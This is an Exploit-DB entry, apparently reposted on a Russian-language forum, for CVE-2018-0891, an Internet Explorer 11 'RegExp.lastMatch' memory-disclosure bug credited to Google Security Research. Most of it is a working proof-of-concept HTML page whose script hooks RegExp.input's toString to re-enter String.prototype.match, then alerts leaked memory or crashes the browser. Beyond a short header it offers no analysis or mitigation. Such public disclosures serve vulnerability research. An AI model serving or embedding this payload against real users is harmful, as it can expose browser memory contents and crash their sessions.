- 34,599
- 0
- 18 Дек 2022
- EDB-ID
- 44312
- Проверка EDB
-
- Пройдено
- Автор
- GOOGLE SECURITY RESEARCH
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2018-0891
- Дата публикации
- 2018-03-20
Internet Explorer - 'RegExp.lastMatch' Memory Disclosure
Код:
/*
There is a vulnerability in Internet Explorer that could potentially be used for memory disclosure.
This was tested on IE11 running on Window 7 64-bit with the latest patches applied.
PoC:
=========================================
*/
<!-- saved from url=(0014)about:internet -->
<script>
function main() {
RegExp.input = {toString: f};
alert(RegExp.lastMatch);
}
var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");
function f() {
String.prototype.match.call(input, "bbbbbbbbbb");
}
main();
</script>
/*
=========================================
Note that sometimes the PoC results in a crash (I made no attempt to make it reliable) while sometimes it results in pieces of memory being displayed
*/- Источник
- www.exploit-db.com
